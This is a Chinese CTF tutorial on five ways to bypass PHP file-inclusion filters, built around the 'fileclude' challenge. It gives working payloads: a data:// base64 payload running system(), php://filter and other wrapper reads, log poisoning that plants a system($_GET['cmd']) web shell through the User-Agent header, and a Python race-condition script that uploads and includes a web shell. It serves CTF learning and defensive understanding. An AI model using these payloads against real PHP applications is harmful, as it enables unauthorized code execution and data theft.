CTF选手必备:5种绕过文件包含限制的骚操作(以攻防世界fileclude为例)
CTF选手进阶:文件包含漏洞的5种高阶绕过实战
在CTF竞赛中,文件包含漏洞一直是Web安全赛道的经典考点。不同于简单的目录遍历,现代CTF题目往往设置了多重过滤机制,需要选手灵活运用编码转换、协议封装等技巧实现突破。本文将以攻防世界平台fileclude题目为蓝本,系统梳理五种实用绕过技术,帮助你在实战中快速定位突破口。
1. 理解文件包含漏洞的核心机制
文件包含漏洞本质上是由于服务端未对用户输入的文件路径进行严格校验,导致攻击者能够包含并执行非预期文件。在PHP环境中,常见的危险函数包括:
include()require()include_once()require_once()
这些函数在设计上允许动态加载代码,但当参数可控时就会形成安全缺口。以fileclude题目为例,其核心漏洞点在于:
if(isset($_GET['file1']) && !empty($_GET['file1'])){ include $_GET['file1']; }关键突破点分析:
- 无后缀限制:未强制校验文件扩展名
- 路径未过滤:未对../等目录跳转字符进行过滤
- 内容可控制:file2参数可通过data协议直接控制
2. 基础绕过:data协议的灵活运用
当目标服务器允许URL包含时,data协议是最直接的利用方式。其基本格式为:
data:[<mediatype>][;base64],<data>在fileclude题目中,我们可以构造如下payload读取flag:
?file1=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==这段base64解码后实际是:
<?php system('cat flag.php');?>注意事项:
- 确保服务器配置中
allow_url_include=On - 短标签
<?可能被禁用,建议使用完整<?php标签 - 某些环境会过滤
php://但放过data://
3. 编码转换:突破内容检测的利器
当题目对包含内容进行检测时(如fileclude要求file2内容必须包含"hello ctf"),编码转换就成为关键手段。以下是三种实用编码方式:
3.1 Base64编码方案
?file1=php://filter/convert.base64-encode/resource=flag.php优势:
- 几乎支持所有PHP环境
- 可嵌套多层过滤器
解码技巧:
echo "PD9waHAgZWNobyAiZmxhZ3t0ZXN0fSI7ID8+" | base64 -d3.2 ROT13编码方案
?file1=php://filter/read=string.rot13/resource=flag.php特点:
- 无需特殊字符即可实现文本转换
- 某些环境下可能被禁用
3.3 压缩流编码方案
?file1=php://filter/zlib.deflate/convert.base64-encode/resource=flag.php复合编码流程:
- 先用zlib压缩
- 再进行base64编码
- 客户端需要反向解码
4. 协议封装:超越文件包含的思维定式
除了常见的data协议,PHP还支持多种wrapper协议:
| 协议类型 | 用途 | 示例 |
|---|---|---|
| php://filter | 编码转换 | php://filter/convert.base64-encode/resource=flag.php |
| phar:// | 解压缩攻击 | phar:///path/to/evil.zip/evil.php |
| zip:// | 压缩包包含 | zip:///path/to/evil.zip%23evil.php |
| expect:// | 命令执行 | expect://id |
实战技巧:
- 当路径可控时,zip协议中的
#需要编码为%23 - phar协议需要目标文件实际存在
- expect协议需要特定扩展支持
5. 日志污染:当常规方法失效时
在严格过滤的场景下,服务器日志文件可能成为突破口。典型步骤如下:
- 通过User-Agent注入PHP代码
- 包含access日志文件
- 触发代码执行
GET /vuln.php?file=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?>关键点:
- 需要知道日志绝对路径
- 日志权限需可读
- 可能受日志轮转影响
6. 条件竞争:突破临时文件限制
某些题目会生成临时文件并短暂保留,此时可采用条件竞争策略:
- 编写脚本快速上传含恶意代码的文件
- 同时发起包含请求
- 在文件删除前完成包含
import requests import threading def upload(): while True: files = {'file': ('evil.php', '<?php system($_GET["cmd"]);?>')} requests.post("http://target/upload.php", files=files) def include(): while True: r = requests.get("http://target/vuln.php?file=./uploads/tmp_evil.php") if "flag{" in r.text: print(r.text) exit() threading.Thread(target=upload).start() threading.Thread(target=include).start()在真实CTF比赛中,这些技术往往需要组合使用。比如在2022年某大型CTF中,一道题目就需要先通过日志污染获取初始权限,再利用phar协议实现横向移动。